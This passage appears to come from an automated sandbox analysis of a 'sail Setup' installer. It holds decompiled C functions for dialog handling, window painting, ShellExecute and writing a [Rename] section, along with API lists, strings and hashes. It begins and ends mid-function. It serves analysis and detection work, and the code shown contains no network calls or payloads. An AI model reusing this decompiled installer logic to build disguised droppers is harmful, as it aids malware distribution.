                                                                                                                          						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
                                                                                                                          						_t81 =  *(_t100 - 0x14);
                                                                                                                          						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                                                                          						if(_t58 != 0) {
                                                                                                                          							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                          							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                                                                                          							_t81 =  *(_t100 - 0x14);
                                                                                                                          						}
                                                                                                                          						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                          						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                                                                          						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                                                                                                                          							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                          							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                                                                                                                          						}
                                                                                                                          						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                          						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                                                                                                          						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                          						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                                                                                                          						if(_t95 >= _t75) {
                                                                                                                          							_t95 = 0x80004005;
                                                                                                                          							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409348, 0x400) != 0) {
                                                                                                                          								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                                                                                                                          								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409348, 1);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                                                                                                                          						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                                                                          					}
                                                                                                                          					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                          					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                                                                          					if(_t95 >= _t75) {
                                                                                                                          						_push(0xfffffff4);
                                                                                                                          					} else {
                                                                                                                          						goto L13;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				E00401423();
                                                                                                                          				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t100 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409348,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 004020AB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                          • API String ID: 123533781-1104044542
                                                                                                                          • Opcode ID: 71453fb45c89770e4f5e9780d50359adef83bdbe6145f3bfd3e7a5e9e412efc0
                                                                                                                          • Instruction ID: ce0b4858a9f81ea3ddc308d80d774a06bef6b406c5dcff46aa6a4b0d76e862c7
                                                                                                                          • Opcode Fuzzy Hash: 71453fb45c89770e4f5e9780d50359adef83bdbe6145f3bfd3e7a5e9e412efc0
                                                                                                                          • Instruction Fuzzy Hash: AE418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E00403ED7(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                                                          				char _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				struct HWND__* _t52;
                                                                                                                          				intOrPtr _t71;
                                                                                                                          				intOrPtr _t85;
                                                                                                                          				long _t86;
                                                                                                                          				int _t98;
                                                                                                                          				struct HWND__* _t99;
                                                                                                                          				signed int _t100;
                                                                                                                          				intOrPtr _t107;
                                                                                                                          				intOrPtr _t109;
                                                                                                                          				int _t110;
                                                                                                                          				signed int* _t112;
                                                                                                                          				signed int _t113;
                                                                                                                          				char* _t114;
                                                                                                                          				CHAR* _t115;
                                                                                                                          
                                                                                                                          				if(_a8 != 0x110) {
                                                                                                                          					if(_a8 != 0x111) {
                                                                                                                          						L11:
                                                                                                                          						if(_a8 != 0x4e) {
                                                                                                                          							if(_a8 == 0x40b) {
                                                                                                                          								 *0x420458 =  *0x420458 + 1;
                                                                                                                          							}
                                                                                                                          							L25:
                                                                                                                          							_t110 = _a16;
                                                                                                                          							L26:
                                                                                                                          							return E00403DF6(_a8, _a12, _t110);
                                                                                                                          						}
                                                                                                                          						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                                                          						_t110 = _a16;
                                                                                                                          						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                                                          							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                                                          							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                                                          							_v12 = _t100;
                                                                                                                          							_v16 = _t109;
                                                                                                                          							_v8 = 0x422e20;
                                                                                                                          							if(_t100 - _t109 < 0x800) {
                                                                                                                          								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                                                          								SetCursor(LoadCursorA(0, 0x7f02));
                                                                                                                          								_t40 =  &_v8; // 0x422e20
                                                                                                                          								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                                                                                                                          								SetCursor(LoadCursorA(0, 0x7f00));
                                                                                                                          								_t110 = _a16;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                                                          							goto L26;
                                                                                                                          						} else {
                                                                                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                                                          								SendMessageA( *0x423e88, 0x111, 1, 0);
                                                                                                                          							}
                                                                                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                                                          								SendMessageA( *0x423e88, 0x10, 0, 0);
                                                                                                                          							}
                                                                                                                          							return 1;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_a12 >> 0x10 != 0 ||  *0x420458 != 0) {
                                                                                                                          						goto L25;
                                                                                                                          					} else {
                                                                                                                          						_t112 =  *0x41fc48 + 0x14;
                                                                                                                          						if(( *_t112 & 0x00000020) == 0) {
                                                                                                                          							goto L25;
                                                                                                                          						}
                                                                                                                          						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                          						E00403DB1(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                          						E00404162();
                                                                                                                          						goto L11;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t98 = _a16;
                                                                                                                          				_t113 =  *(_t98 + 0x30);
                                                                                                                          				if(_t113 < 0) {
                                                                                                                          					_t107 =  *0x42365c; // 0x48b9e6
                                                                                                                          					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                                                                                          				}
                                                                                                                          				_t71 =  *0x423eb8; // 0x48a39c
                                                                                                                          				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                                                          				_t114 = _t113 + _t71;
                                                                                                                          				_push(0x22);
                                                                                                                          				_a16 =  *_t114;
                                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                                          				_t115 = _t114 + 1;
                                                                                                                          				_v16 = _t115;
                                                                                                                          				_v8 = E00403EA3;
                                                                                                                          				E00403D8F(_a4);
                                                                                                                          				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                                                          				_push(0x23);
                                                                                                                          				E00403D8F(_a4);
                                                                                                                          				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                                          				E00403DB1( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                                                          				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                                                          				E00403DC4(_t99);
                                                                                                                          				SendMessageA(_t99, 0x45b, 1, 0);
                                                                                                                          				_t85 =  *0x423e90; // 0x4868b0
                                                                                                                          				_t86 =  *(_t85 + 0x68);
                                                                                                                          				if(_t86 < 0) {
                                                                                                                          					_t86 = GetSysColor( ~_t86);
                                                                                                                          				}
                                                                                                                          				SendMessageA(_t99, 0x443, 0, _t86);
                                                                                                                          				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                                                          				 *0x41f43c =  *0x41f43c & 0x00000000;
                                                                                                                          				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                                                          				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                                                                          				 *0x420458 =  *0x420458 & 0x00000000;
                                                                                                                          				return 0;
                                                                                                                          			}


                                                                                                                          APIs
                                                                                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F62
                                                                                                                          • GetDlgItem.USER32 ref: 00403F76
                                                                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403F94
                                                                                                                          • GetSysColor.USER32(?), ref: 00403FA5
                                                                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FB4
                                                                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FC3
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00403FCD
                                                                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FDB
                                                                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403FEA
                                                                                                                          • GetDlgItem.USER32 ref: 0040404D
                                                                                                                          • SendMessageA.USER32(00000000), ref: 00404050
                                                                                                                          • GetDlgItem.USER32 ref: 0040407B
                                                                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040BB
                                                                                                                          • LoadCursorA.USER32 ref: 004040CA
                                                                                                                          • SetCursor.USER32(00000000), ref: 004040D3
                                                                                                                          • ShellExecuteA.SHELL32(0000070B,open, .B,00000000,00000000,00000001), ref: 004040E6
                                                                                                                          • LoadCursorA.USER32 ref: 004040F3
                                                                                                                          • SetCursor.USER32(00000000), ref: 004040F6
                                                                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404122
                                                                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404136
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                          • String ID: .B$N$open
                                                                                                                          • API String ID: 3615053054-847860968
                                                                                                                          • Opcode ID: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                                                                                                          • Instruction ID: 4310844e4bc5412d85e0e67e924f78a0a7df87fdbfd2fc52009ff806257c2229
                                                                                                                          • Opcode Fuzzy Hash: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                                                                                                          • Instruction Fuzzy Hash: 3161A1B1A40209BFEB109F60DC45F6A7B69EB54715F108036FB05BA2D1C7B8E951CF98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                          				struct tagLOGBRUSH _v16;
                                                                                                                          				struct tagRECT _v32;
                                                                                                                          				struct tagPAINTSTRUCT _v96;
                                                                                                                          				struct HDC__* _t70;
                                                                                                                          				struct HBRUSH__* _t87;
                                                                                                                          				struct HFONT__* _t94;
                                                                                                                          				long _t102;
                                                                                                                          				intOrPtr _t115;
                                                                                                                          				signed int _t126;
                                                                                                                          				struct HDC__* _t128;
                                                                                                                          				intOrPtr _t130;
                                                                                                                          
                                                                                                                          				if(_a8 == 0xf) {
                                                                                                                          					_t130 =  *0x423e90; // 0x4868b0
                                                                                                                          					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                          					_a8 = _t70;
                                                                                                                          					GetClientRect(_a4,  &_v32);
                                                                                                                          					_t126 = _v32.bottom;
                                                                                                                          					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                          					while(_v32.top < _t126) {
                                                                                                                          						_a12 = _t126 - _v32.top;
                                                                                                                          						asm("cdq");
                                                                                                                          						asm("cdq");
                                                                                                                          						asm("cdq");
                                                                                                                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                          						_t87 = CreateBrushIndirect( &_v16);
                                                                                                                          						_v32.bottom = _v32.bottom + 4;
                                                                                                                          						_a16 = _t87;
                                                                                                                          						FillRect(_a8,  &_v32, _t87);
                                                                                                                          						DeleteObject(_a16);
                                                                                                                          						_v32.top = _v32.top + 4;
                                                                                                                          					}
                                                                                                                          					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                          						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                                                          						_a16 = _t94;
                                                                                                                          						if(_t94 != 0) {
                                                                                                                          							_t128 = _a8;
                                                                                                                          							_v32.left = 0x10;
                                                                                                                          							_v32.top = 8;
                                                                                                                          							SetBkMode(_t128, 1);
                                                                                                                          							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                          							_a8 = SelectObject(_t128, _a16);
                                                                                                                          							DrawTextA(_t128, "sail Setup", 0xffffffff,  &_v32, 0x820);
                                                                                                                          							SelectObject(_t128, _a8);
                                                                                                                          							DeleteObject(_a16);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					EndPaint(_a4,  &_v96);
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_t102 = _a16;
                                                                                                                          				if(_a8 == 0x46) {
                                                                                                                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                          					_t115 =  *0x423e88; // 0x90256
                                                                                                                          					 *((intOrPtr*)(_t102 + 4)) = _t115;
                                                                                                                          				}
                                                                                                                          				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                                                          			}


                                                                                                                          APIs
                                                                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                          • GetClientRect.USER32 ref: 0040105B
                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                          • FillRect.USER32 ref: 004010E4
                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                          • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                          • DrawTextA.USER32(00000000,sail Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                          • String ID: F$sail Setup
                                                                                                                          • API String ID: 941294808-1648923976
                                                                                                                          • Opcode ID: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                                                                                                          • Instruction ID: 87972a138d556bacb88ba9c7fcdf6f47da3ec758f00315b8b39b68d2b09e4b9a
                                                                                                                          • Opcode Fuzzy Hash: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                                                                                                          • Instruction Fuzzy Hash: 6441BC71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C378EA54DFA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E0040572B() {
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				intOrPtr* _t15;
                                                                                                                          				long _t16;
                                                                                                                          				intOrPtr _t18;
                                                                                                                          				int _t20;
                                                                                                                          				void* _t28;
                                                                                                                          				long _t29;
                                                                                                                          				intOrPtr* _t37;
                                                                                                                          				int _t43;
                                                                                                                          				void* _t44;
                                                                                                                          				long _t47;
                                                                                                                          				CHAR* _t49;
                                                                                                                          				void* _t51;
                                                                                                                          				void* _t53;
                                                                                                                          				intOrPtr* _t54;
                                                                                                                          				void* _t55;
                                                                                                                          				void* _t56;
                                                                                                                          
                                                                                                                          				_t15 = E00405CFF(1);
                                                                                                                          				_t49 =  *(_t55 + 0x18);
                                                                                                                          				if(_t15 != 0) {
                                                                                                                          					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                                                                                          					if(_t20 != 0) {
                                                                                                                          						L16:
                                                                                                                          						 *0x423f10 =  *0x423f10 + 1;
                                                                                                                          						return _t20;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				 *0x422608 = 0x4c554e;
                                                                                                                          				if(_t49 == 0) {
                                                                                                                          					L5:
                                                                                                                          					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422080, 0x400);
                                                                                                                          					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                                                          						_t43 = wsprintfA(0x421c80, "%s=%s\r\n", 0x422608, 0x422080);
                                                                                                                          						_t18 =  *0x423e90; // 0x4868b0
                                                                                                                          						_t56 = _t55 + 0x10;
                                                                                                                          						E004059FF(_t43, 0x400, 0x422080, 0x422080,  *((intOrPtr*)(_t18 + 0x128)));
                                                                                                                          						_t20 = E004056B4(0x422080, 0xc0000000, 4);
                                                                                                                          						_t53 = _t20;
                                                                                                                          						 *(_t56 + 0x14) = _t53;
                                                                                                                          						if(_t53 == 0xffffffff) {
                                                                                                                          							goto L16;
                                                                                                                          						}
                                                                                                                          						_t47 = GetFileSize(_t53, 0);
                                                                                                                          						_t7 = _t43 + 0xa; // 0xa
                                                                                                                          						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                                                                                          						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                                                                                          							L15:
                                                                                                                          							_t20 = CloseHandle(_t53);
                                                                                                                          							goto L16;
                                                                                                                          						} else {
                                                                                                                          							if(E00405629(_t51, "[Rename]\r\n") != 0) {
                                                                                                                          								_t28 = E00405629(_t26 + 0xa, 0x409330);
                                                                                                                          								if(_t28 == 0) {
                                                                                                                          									L13:
                                                                                                                          									_t29 = _t47;
                                                                                                                          									L14:
                                                                                                                          									E00405675(_t51 + _t29, 0x421c80, _t43);
                                                                                                                          									SetFilePointer(_t53, 0, 0, 0);
                                                                                                                          									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                                                                                                          									GlobalFree(_t51);
                                                                                                                          									goto L15;
                                                                                                                          								}
                                                                                                                          								_t37 = _t28 + 1;
                                                                                                                          								_t44 = _t51 + _t47;
                                                                                                                          								_t54 = _t37;
                                                                                                                          								if(_t37 >= _t44) {
                                                                                                                          									L21:
                                                                                                                          									_t53 =  *(_t56 + 0x14);
                                                                                                                          									_t29 = _t37 - _t51;
                                                                                                                          									goto L14;
                                                                                                                          								} else {
                                                                                                                          									goto L20;
                                                                                                                          								}
                                                                                                                          								do {
                                                                                                                          									L20:
                                                                                                                          									 *((char*)(_t43 + _t54)) =  *_t54;
                                                                                                                          									_t54 = _t54 + 1;
                                                                                                                          								} while (_t54 < _t44);
                                                                                                                          								goto L21;
                                                                                                                          							}
                                                                                                                          							E004059DD(_t51 + _t47, "[Rename]\r\n");
                                                                                                                          							_t47 = _t47 + 0xa;
                                                                                                                          							goto L13;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					CloseHandle(E004056B4(_t49, 0, 1));
                                                                                                                          					_t16 = GetShortPathNameA(_t49, 0x422608, 0x400);
                                                                                                                          					if(_t16 != 0 && _t16 <= 0x400) {
                                                                                                                          						goto L5;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t16;
                                                                                                                          			}






















                                                                                                                          0x00405849
                                                                                                                          0x00000000
                                                                                                                          0x00405849
                                                                                                                          0x00405810
                                                                                                                          0x0040576d
                                                                                                                          0x00405778
                                                                                                                          0x00405781
                                                                                                                          0x00405785
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405785
                                                                                                                          0x00405892

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                            • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                            • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004054C0,?,00000000,000000F1,?), ref: 00405778
                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 00405781
                                                                                                                          • GetShortPathNameA.KERNEL32 ref: 0040579E
                                                                                                                          • wsprintfA.USER32 ref: 004057BC
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00422080,C0000000,00000004,00422080,?,?,?,00000000,000000F1,?), ref: 004057F7
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405806
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040581C
                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421C80,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405862
                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405874
                                                                                                                          • GlobalFree.KERNEL32 ref: 0040587B
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405882
                                                                                                                            • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                                                                                                            • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                                                          • String ID: %s=%s$[Rename]
                                                                                                                          • API String ID: 3772915668-1727408572
                                                                                                                          • Opcode ID: 07c12176a5373c156f7b76f79e2b8e53ec089a42cccabde25e202c2098703b15
                                                                                                                          • Instruction ID: 243778ea09c2d6121d89995a0746b628a30f71b2b4e684d8516dd3187c24d480
                                                                                                                          • Opcode Fuzzy Hash: 07c12176a5373c156f7b76f79e2b8e53ec089a42cccabde25e202c2098703b15
                                                                                                                          • Instruction Fuzzy Hash: 0E412032A05B067BE3207B619C48F6B3A5CEB40754F004436FD05F62D2EA38A8018ABE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E100025FE(void* __edx, intOrPtr* _a4) {
                                                                                                                          				intOrPtr _v4;
                                                                                                                          				intOrPtr* _t18;
                                                                                                                          				intOrPtr _t21;
                                                                                                                          				void* _t23;
                                                                                                                          				short* _t24;
                                                                                                                          				void* _t25;
                                                                                                                          				void* _t30;
                                                                                                                          				void* _t32;
                                                                                                                          				void* _t34;
                                                                                                                          				int _t36;
                                                                                                                          				void* _t39;
                                                                                                                          				void* _t42;
                                                                                                                          				intOrPtr _t52;
                                                                                                                          				short** _t55;
                                                                                                                          				void* _t60;
                                                                                                                          				int _t61;
                                                                                                                          				int _t62;
                                                                                                                          				void* _t63;
                                                                                                                          				short** _t64;
                                                                                                                          				void* _t65;
                                                                                                                          				void* _t66;
                                                                                                                          
                                                                                                                          				_t60 = __edx;
                                                                                                                          				_t18 = _a4;
                                                                                                                          				_t52 =  *((intOrPtr*)(_t18 + 0x814));
                                                                                                                          				_v4 = _t52;
                                                                                                                          				_t55 = (_t52 + 0x41 << 5) + _t18;
                                                                                                                          				do {
                                                                                                                          					if( *((intOrPtr*)(_t55 - 4)) != 0xffffffff) {
                                                                                                                          						_t64 = _t55;
                                                                                                                          					} else {
                                                                                                                          						_t64 =  *_t55;
                                                                                                                          					}
                                                                                                                          					_t65 = E10001541();
                                                                                                                          					_t61 = 0;
                                                                                                                          					_t21 =  *((intOrPtr*)(_t55 - 8));
                                                                                                                          					if(_t21 == 0) {
                                                                                                                          						lstrcpyA(_t65, 0x10004034);
                                                                                                                          					} else {
                                                                                                                          						_t30 = _t21 - 1;
                                                                                                                          						if(_t30 == 0) {
                                                                                                                          							_push( *_t64);
                                                                                                                          							goto L12;
                                                                                                                          						} else {
                                                                                                                          							_t32 = _t30 - 1;
                                                                                                                          							if(_t32 == 0) {
                                                                                                                          								E1000176C(_t60,  *_t64, _t64[1], _t65);
                                                                                                                          								goto L13;
                                                                                                                          							} else {
                                                                                                                          								_t34 = _t32 - 1;
                                                                                                                          								if(_t34 == 0) {
                                                                                                                          									_t62 = lstrlenA( *_t64);
                                                                                                                          									_t36 =  *0x10004058;
                                                                                                                          									if(_t62 >= _t36) {
                                                                                                                          										_t62 = _t36 - 1;
                                                                                                                          									}
                                                                                                                          									_t7 = _t62 + 1; // 0x1
                                                                                                                          									lstrcpynA(_t65,  *_t64, _t7);
                                                                                                                          									 *(_t62 + _t65) =  *(_t62 + _t65) & 0x00000000;
                                                                                                                          									goto L15;
                                                                                                                          								} else {
                                                                                                                          									_t39 = _t34 - 1;
                                                                                                                          									if(_t39 == 0) {
